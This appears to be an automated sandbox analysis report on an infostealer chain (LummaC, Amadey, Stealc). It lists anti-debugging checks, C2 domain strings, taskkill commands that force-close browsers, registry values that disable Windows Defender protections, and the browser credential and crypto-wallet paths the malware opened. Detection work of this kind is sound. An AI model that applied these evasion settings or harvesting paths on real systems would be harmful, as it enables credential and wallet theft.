Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Code function: 3_2_05030424 rdtsc 3_2_05030424
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Code function: 6_2_00A9B7B2 LdrInitializeThunk, 6_2_00A9B7B2
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 9NWW1UIUAOJA8NFOZHWEDA.exe PID: 1340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ef2532c0b1.exe PID: 1016, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
LummaC encrypted strings found
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: clearancek.site
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: licendfilteo.site
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: spirittunek.store
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bathdoomgaz.store
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: studennotediw.store
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: dissapoiznw.store
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: eaglepawnoy.store
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mobbipenju.store
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe "C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe "C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe "C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001229001\num.exe "C:\Users\user\AppData\Local\Temp\1001229001\num.exe" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 90bef5afae.exe, 0000000E.00000000.3036690309.00000000006D2000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ST44OD0PMG8MCMYJRN4.exe, ST44OD0PMG8MCMYJRN4.exe, 00000003.00000002.2368194252.000000000031E000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, skotes.exe, 00000005.00000002.2404972213.000000000097E000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: OkProgram Manager
Source: ef2532c0b1.exe, ef2532c0b1.exe, 0000000C.00000002.3013331115.0000000000421000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: Program Manager
Source: firefox.exe, 0000001B.00000002.3257115436.0000004BF73FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: 26e226f915.exe, 0000000B.00000002.2902860466.0000000000A62000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: 9Program Manager
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, 00000006.00000002.2505966124.0000000000C6F000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: 3Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001229001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001229001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Registry value created: TamperProtection 0 Jump to behavior
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000000.00000003.2214786927.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 26e226f915.exe, 0000000D.00000003.3165945579.000000000169A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 37.2.J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.skotes.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ST44OD0PMG8MCMYJRN4.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2368072745.0000000000131000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3296905401.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2327332998.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2733867471.0000000004F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2404867306.0000000000791000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2364334996.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3339391328.0000000000821000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: 0000000E.00000003.3097542418.000000000135F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 90bef5afae.exe PID: 5204, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7160, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 26e226f915.exe PID: 4020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 26e226f915.exe PID: 6764, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 39.2.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.0.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.9NWW1UIUAOJA8NFOZHWEDA.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.ef2532c0b1.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.ef2532c0b1.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000002.3104366518.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.3089240746.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3013087261.0000000000041000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.3176264555.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2972676425.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2408818591.00000000004A1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3340338956.0000000001097000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3222497122.0000000000041000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3230829652.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3113201257.000000000129E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2368421842.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.3324835217.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3014293851.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3337452066.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.3322904939.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2416316812.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9NWW1UIUAOJA8NFOZHWEDA.exe PID: 1340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ef2532c0b1.exe PID: 1016, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000003.2167852382.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s/Electrum-LTCDuOKvC'
Source: 26e226f915.exe String found in binary or memory: Wallets/ElectronCash
Source: file.exe String found in binary or memory: Jaxx Liberty
Source: 26e226f915.exe String found in binary or memory: window-state.json
Source: file.exe String found in binary or memory: ExodusWeb3
Source: 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: file.exe, 00000000.00000003.2197812548.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
